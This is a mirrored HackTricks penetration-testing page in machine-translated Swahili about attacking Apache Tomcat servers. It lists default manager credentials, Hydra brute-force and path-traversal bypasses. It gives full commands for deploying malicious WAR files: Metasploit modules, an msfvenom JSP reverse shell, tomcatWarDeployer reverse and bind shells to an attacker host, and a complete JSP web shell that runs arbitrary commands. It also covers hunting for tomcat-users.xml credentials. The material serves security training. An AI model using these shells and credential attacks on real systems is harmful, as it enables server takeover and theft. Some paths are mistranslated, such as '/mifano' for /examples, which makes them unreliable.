Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-30 00:20:59 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/tomcat
History
Translator 54ad6cd51c Translated ['network-services-pentesting/pentesting-web/tomcat/README.md
2024-04-11 00:57:14 +00:00
..
basic-tomcat-info.md Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00
README.md Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:14 +00:00

README.md

Tomcat

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Kikundi cha Usalama cha Try Hard

{% embed url="https://discord.gg/tryhardsecurity" %}

Kugundua

  • Kawaida inaendeshwa kwenye bandari 8080
  • Kosa la Kawaida la Tomcat:

Uchambuzi

Uthibitisho wa Toleo

Ili kupata toleo la Apache Tomcat, amri rahisi inaweza kutekelezwa:

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

Mahali pa Faili za Meneja

Kutambua maeneo sahihi ya /manager na /host-manager ni muhimu kwani majina yao yanaweza kubadilishwa. Tafutizo la nguvu linapendekezwa ili kutambua kurasa hizi.

Uorodheshaji wa Majina ya Mtumiaji

Kwa toleo la Tomcat la zamani kuliko 6, inawezekana kuorodhesha majina ya mtumiaji kupitia:

msf> use auxiliary/scanner/http/tomcat_enum

Mandhari za Msingi

/manager/html directory ni nyeti sana kwani inaruhusu kupakia na kutekeleza faili za WAR, ambazo zinaweza kusababisha utekelezaji wa nambari. Directory hii inalindwa na uthibitishaji wa msingi wa HTTP, na mandhari za kawaida ni:

  • admin:admin
  • tomcat:tomcat
  • admin:
  • admin:s3cr3t
  • tomcat:s3cr3t
  • admin:tomcat

Mandhari hizi zinaweza kujaribiwa kutumia:

msf> use auxiliary/scanner/http/tomcat_mgr_login

Directory nyingine muhimu ni /manager/status, ambayo inaonyesha toleo la Tomcat na OS, ikisaidia kutambua udhaifu.

Shambulio la Nguvu Kubwa

Kujaribu shambulio la nguvu kwenye directory ya meneja, mtu anaweza kutumia:

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

Mchanganyiko wa Madokezo

Kufichua Nyuma ya Neno la Siri

Kupata /auth.jsp kunaweza kufichua neno la siri katika nyuma ya neno la siri chini ya hali za bahati.

Ukodishaji wa URL Mara Mbili

Udhaifu wa CVE-2007-1860 katika mod_jk huruhusu ukodishaji wa njia mara mbili, ukiwezesha ufikiaji usiohalali kwenye kiolesura cha usimamizi kupitia URL iliyoundwa kwa makini.

Ili kupata wavuti ya usimamizi wa Tomcat enda: pathTomcat/%252E%252E/manager/html

/mifano

Toleo la Apache Tomcat kutoka 4.x hadi 7.x lina skripti za mfano ambazo zinaweza kufichua habari na kushambuliwa na mashambulizi ya msalaba wa tovuti (XSS). Skripti hizi, zilizoorodheshwa kwa kina, zinapaswa kuchunguzwa kwa ufikiaji usiohalali na uwezekano wa kutumiwa vibaya. Pata maelezo zaidi hapa

  • /mifano/jsp/num/numguess.jsp
  • /mifano/jsp/dates/date.jsp
  • /mifano/jsp/snp/snoop.jsp
  • /mifano/jsp/error/error.html
  • /mifano/jsp/sessions/carts.html
  • /mifano/jsp/checkbox/check.html
  • /mifano/jsp/colors/colors.html
  • /mifano/jsp/cal/login.html
  • /mifano/jsp/include/include.jsp
  • /mifano/jsp/forward/forward.jsp
  • /mifano/jsp/plugin/plugin.jsp
  • /mifano/jsp/jsptoserv/jsptoservlet.jsp
  • /mifano/jsp/simpletag/foo.jsp
  • /mifano/jsp/mail/sendmail.jsp
  • /mifano/servlet/HelloWorldExample
  • /mifano/servlet/RequestInfoExample
  • /mifano/servlet/RequestHeaderExample
  • /mifano/servlet/RequestParamExample
  • /mifano/servlet/CookieExample
  • /mifano/servlet/JndiServlet
  • /mifano/servlet/SessionExample
  • /tomcat-docs/appdev/sample/web/hello.jsp

Udanganyifu wa Njia

Katika mipangilio inayoweza kudhurika ya Tomcat unaweza kupata ufikiaji kwenye saraka zilizolindwa katika Tomcat kwa kutumia njia: /..;/

Kwa hivyo, kwa mfano, unaweza kupata ukurasa wa msimamizi wa Tomcat kwa kufikia: www.vulnerable.com/lalala/..;/manager/html

Njia nyingine ya kuzidi njia zilizolindwa kwa kutumia hila hii ni kufikia http://www.vulnerable.com/;param=value/manager/html

RCE

Hatimaye, ikiwa una ufikiaji kwenye Meneja wa Programu ya Wavuti ya Tomcat, unaweza kupakia na kutekeleza faili ya .war (kutekeleza nambari).

Vizuizi

Utaweza tu kutekeleza WAR ikiwa una mamlaka za kutosha (majukumu: admin, manager na manager-script). Maelezo hayo yanaweza kupatikana chini ya tomcat-users.xml kawaida iliyoainishwa katika /usr/share/tomcat9/etc/tomcat-users.xml (inatofautiana kati ya toleo) (angalia POST sehemu).

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

Metasploit

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom Reverse Shell

  1. Unda war kwa ajili ya kupeleka:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
  1. Pakia faili ya revshell.war na ufikie (/revshell/):

Bind na reverse shell na tomcatWarDeployer.py

Katika hali fulani hii haifanyi kazi (kwa mfano toleo za zamani za sun)

Pakua

git clone https://github.com/mgeeky/tomcatWarDeployer.git

Kitanzi cha Nyuma

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

Bind shell

Shell ya Bind

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

Kutumia Culsterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

Mbinu ya kawaida - Web shell

Tengeneza index.jsp na maudhui haya:

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>

mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it

Unaweza pia kusakinisha hii (inaruhusu kupakia, kupakua na utekelezaji wa amri): http://vonloesch.de/filebrowser.html

Mbinu ya Kufanya kwa Mikono 2

Pata kabibi ya wavuti ya JSP kama hii na unda faili ya WAR:

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

Jina la faili ya siri ya Tomcat ni tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null

Njia nyingine za kukusanya sifa za Tomcat:

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

Vifaa vingine vya uchunguzi wa tomcat

Marejeo

Kikundi cha Usalama cha Kujitahidi

{% embed url="https://discord.gg/tryhardsecurity" %}

Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!